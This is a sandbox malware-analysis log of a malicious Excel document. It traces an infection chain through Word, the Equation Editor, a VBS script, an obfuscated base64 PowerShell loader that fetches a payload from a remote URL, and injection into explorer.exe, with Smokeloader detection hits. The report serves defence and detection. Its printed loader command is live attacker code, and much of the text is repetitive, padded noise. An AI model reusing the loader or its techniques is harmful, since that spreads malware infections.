?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\dagifhdMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 770B0000 page execute and read and write
            Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 770B0000 page execute and read and write
            Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 770B0000 page execute and read and write
            Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 770B0000 page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00402F5D RtlCreateUserThread,NtTerminateProcess,14_2_00402F5D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004014BF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,14_2_004014BF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00402321 NtQuerySystemInformation,NtQueryInformationProcess,14_2_00402321
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004025D3 NtClose,14_2_004025D3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004014D6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,14_2_004014D6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004022D8 NtQuerySystemInformation,NtQueryInformationProcess,14_2_004022D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004022D9 NtQuerySystemInformation,NtQueryInformationProcess,14_2_004022D9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004022E5 NtQuerySystemInformation,NtQueryInformationProcess,14_2_004022E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004014E8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,14_2_004014E8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004014EB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,14_2_004014EB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004022F7 NtQuerySystemInformation,NtQueryInformationProcess,14_2_004022F7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00402686 NtClose,14_2_00402686
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040328D GetModuleHandleA,Sleep,MapViewOfFile,LocalAlloc,OpenProcessToken,NtOpenKey,wcsstr,tolower,towlower,14_2_0040328D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004030BF RtlCreateUserThread,NtTerminateProcess,14_2_004030BF
            Source: C:\Windows\explorer.exeCode function: 15_2_02802FAC NtQueryInformationProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,15_2_02802FAC
            Source: C:\Windows\explorer.exeCode function: 15_2_02804760 NtCreateSection,15_2_02804760
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C4B92 RtlMoveMemory,NtUnmapViewOfSection,19_2_000C4B92
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C33C3 NtQueryInformationFile,19_2_000C33C3
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C342B NtQueryObject,NtQueryObject,RtlMoveMemory,19_2_000C342B
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C349B CreateFileW,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,lstrcmpiW,NtQueryObject,StrRChrW,StrRChrW,lstrcmpiW,GetFileSize,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,CloseHandle,CloseHandle,CloseHandle,19_2_000C349B
            Source: C:\Windows\explorer.exeCode function: 20_2_000638B0 NtUnmapViewOfSection,20_2_000638B0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_2_00081016 RtlMoveMemory,NtUnmapViewOfSection,21_2_00081016
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_00083D8D RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,22_2_00083D8D
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_00082E1B OpenProcess,lstrcmpi,NtQueryInformationProcess,NtQueryInformationProcess,StrStrIW,22_2_00082E1B
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_00081F4E NtCreateSection,NtMapViewOfSection,22_2_00081F4E
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_00081FE5 lstrcmpi,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,22_2_00081FE5
            Source: C:\Windows\explorer.exeCode function: 23_2_000E5300 RtlAllocateHeap,NtUnmapViewOfSection,23_2_000E5300
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_00081016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpi,CreateToolhelp32Snapshot,Process32First,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,lstrcmpi,Process32Next,CloseHandle,Sleep,24_2_00081016
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_00081A80 NtCreateSection,NtMapViewOfSection,24_2_00081A80
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_00081819 lstrcmpi,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,24_2_00081819
            Source: C:\Windows\explorer.exeCode function: 25_2_000E355C RtlAllocateHeap,NtUnmapViewOfSection,25_2_000E355C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 26_2_00081016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpi,lstrcmpi,Process32Next,CloseHandle,Sleep,26_2_00081016
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 26_2_00081B26 NtCreateSection,NtMapViewOfSection,26_2_00081B26
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 26_2_000818BF OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,26_2_000818BF
            Source: C:\Windows\explorer.exeCode function: 27_2_000E370C RtlAllocateHeap,NtUnmapViewOfSection,27_2_000E370C
            Source: C:\Windows\explorer.exeFile deleted: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00304D6013_2_00304D60
            Source: C:\Windows\explorer.exeCode function: 15_2_0280284015_2_02802840
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C219819_2_000C2198
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000CC2F919_2_000CC2F9
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000DB35C19_2_000DB35C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_0011443819_2_00114438
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000DB97E19_2_000DB97E
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C6E6A19_2_000C6E6A
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000E5F0819_2_000E5F08
            Source: C:\Windows\explorer.exeCode function: 20_2_00061E2020_2_00061E20
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_2_0008170B21_2_0008170B
            Source: C:\Windows\explorer.exeCode function: 23_2_000E2C0023_2_000E2C00
            Source: C:\Windows\explorer.exeCode function: 25_2_000E205425_2_000E2054
            Source: C:\Windows\explorer.exeCode function: 25_2_000E286025_2_000E2860
            Source: C:\Windows\explorer.exeCode function: 27_2_000E2A0427_2_000E2A04
            Source: C:\Windows\explorer.exeCode function: 27_2_000E20F427_2_000E20F4
            Source: 40830001.xlsOLE indicator, VBA macros: true
            Source: 40830001.xlsStream path 'MBD0018266D/\x1Ole' : https://crash.sh/udMVqm--C@F?n^fVHD}0I9tPD'uN|)"k'^CuR@S6B"n:7E{@%9lwSg2'3'l?X %aXB.lL<F=ZBqPB\ ^TMD.h7lSRpirkvKnPiDgAv75NF[82?8vJSpQtRjW
            Source: ~WRF{21E9ADCA-4DF6-4ACD-96FE-092206FC804F}.tmp.4.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\dagifhd D2F0B87E2D2707685C4D35F8F05B42FB8326EF4E70D16097B8837DABA06AC961
            Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 000C8801 appears 40 times
            Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 000C7F70 appears 32 times
            Source: 0000000E.00000002.465506126.0000000000131000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: 0000000E.00000002.465492462.0000000000110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: Process Memory Space: powershell.exe PID: 2984, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 2892, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\inetmecangetbackwithentirethingstobefinewithmesheisnicegirlwholovetodrivethemagicofnicepersonwithmegreatthingshappeningwith_________goodgirlgreatday[1].doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EADD419E.doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
            Source: classification engineClassification label: mal100.bank.troj.spyw.expl.evad.winXLS@32/34@13/4
            Source: C:\Windows\explorer.exeCode function: 15_2_02803BF4 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,SleepEx,15_2_02803BF4
            Source: C:\Windows\explorer.exeCode function: 15_2_028035E8 CoCreateInstance,15_2_028035E8
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\96630000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\dagifhdMutant created: NULL
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR862F.tmpJump to behavior
            Source: 40830001.xlsOLE indicator, Workbook stream: true
            Source: 96630000.0.drOLE indicator, Workbook stream: true
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................T.r.u.e.(.P............. .......$........t.........................s............................................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ....................................u.e.(.P............. .......`........t.........................s............................................Jump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: 40830001.xlsReversingLabs: Detection: 26%
            Source: 40830001.xlsVirustotal: Detection: 9%
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? 